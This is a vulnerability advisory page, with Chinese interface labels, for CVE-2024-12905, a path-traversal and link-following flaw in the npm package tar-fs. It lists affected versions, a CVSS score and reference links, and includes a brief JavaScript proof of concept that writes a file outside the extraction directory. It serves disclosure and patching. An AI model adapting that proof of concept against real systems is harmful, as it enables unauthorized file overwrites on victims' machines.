CVE-2024-12905
HIGH7.5EPSS 0.81%tar-fs Vulnerable to Link Following and Path Traversal via Extracting a Crafted tar File
描述
An Improper Link Resolution Before File Access ("Link Following") and Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal"). This vulnerability occurs when extracting a maliciously crafted tar file, which can result in unauthorized file writes or overwrites outside the intended extraction directory. The issue is associated with index.js in the tar-fs package. This issue affects tar-fs: from 0.0.0 before 1.16.4, from 2.0.0 before 2.1.2, from 3.0.0 before 3.0.7. ### PoC ```javascript // Create a writable stream to extract the tar content const extractStream = tarfs.extract('/', { // We can ignore the file type checks to allow the extraction of the malicious file ignore: (name) => false, }); // Create a tar stream const tarStream = tarfs.pack().on('error', (err) => { throw err; }); // Append the malicious entry to the tar stream tarStream.entry({ name: '/flag.txt', mode: 0o644 }, Buffer.from('This is a flag!')); // Finalize the tar stream tarStream.finalize(); // Pipe the tar stream into the extract stream tarStream.pipe(extractStream); ```
受影響套件(3)
- Debian/node-tar-fsfrom 0, < 2.1.3-0+deb11u1
- Debian/node-tar-fsfrom 0, < 2.1.3-0+deb11u1
- npm/tar-fsfrom 0, < 1.16.4
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |
參考連結(8)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-12905
- ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2024-12905
- PATCHhttps://github.com/mafintosh/tar-fs
- WEBhttps://arxiv.org/abs/2506.04962
- WEBhttps://arxiv.org/pdf/2506.04962
- WEBhttps://github.com/mafintosh/tar-fs/commit/a1dd7e7c7f4b4a8bd2ab60f513baca573b44e2ed
- WEBhttps://lists.debian.org/debian-lts-announce/2025/06/msg00012.html
- WEBhttps://www.seal.security/blog/a-link-to-the-past-uncovering-a-new-vulnerability-in-tar-fs